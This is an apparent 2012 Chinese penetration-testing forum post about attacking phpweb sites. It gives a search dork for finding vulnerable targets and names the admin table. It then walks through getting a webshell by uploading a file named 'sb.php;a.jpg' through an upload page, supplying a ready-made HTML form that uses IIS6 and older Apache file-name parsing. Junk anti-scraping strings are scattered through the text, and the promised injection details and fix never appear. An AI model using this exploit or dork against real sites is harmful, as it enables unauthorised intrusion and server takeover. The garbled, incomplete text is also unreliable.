中国网络渗透测试联盟
标题:
phpweb成品网站全版本通杀注入漏洞及修复
[打印本页]
作者:
admin
时间:
2012-11-9 20:52
标题:
phpweb成品网站全版本通杀注入漏洞及修复
关键字:inurl:webmall/detail.php?id
7 J, J- t( l6 I
7 W/ R, r9 _/ w4 l$ E& S
数据表:pwn_base_admin
- \4 [! N2 q: o2 J9 K# E7 A, X4 v
S% G- T4 M; t# W. W, I
关于拿shell
7 L0 S. G+ n$ m5 h0 ^& Q; E- k! V1 ]
( \, x: r4 V( {1 v V h* \# ]6 g K
首先登录后台admin.php
$ Y% p5 y; f+ x9 o. s" t* A& }
7 W9 g! a2 x" ?! K
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
! [, h% ~2 Q; P' ^, h) Q
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
: m4 c' U, {4 ^/ m: b
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
" r6 C; Z+ V! g& ?& \
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
7 f, l# l3 h! m& m0 D
<input type="text" name="fileName" value="sb.php;a.jpg" />
7 N4 P4 ?* S4 F
<input type="hidden" name="attachPath" value="news/pics/" />
% _4 U a& G5 e& J6 P
<input type="file" name="fileData" size="14" /></td>
+ K3 h+ G7 h; K
<input type="submit" name="button" value="确定" />
9 r" i5 q o9 k8 [3 T1 @
</form>
- ]5 Y( M9 U$ L& D8 I- `1 K# c
" _! A& Q; e2 `" T4 i- n
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
. X. R/ }2 @6 `# B- g: [# H
5 e3 }6 m$ F8 R9 g/ u- ^, ?$ W
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2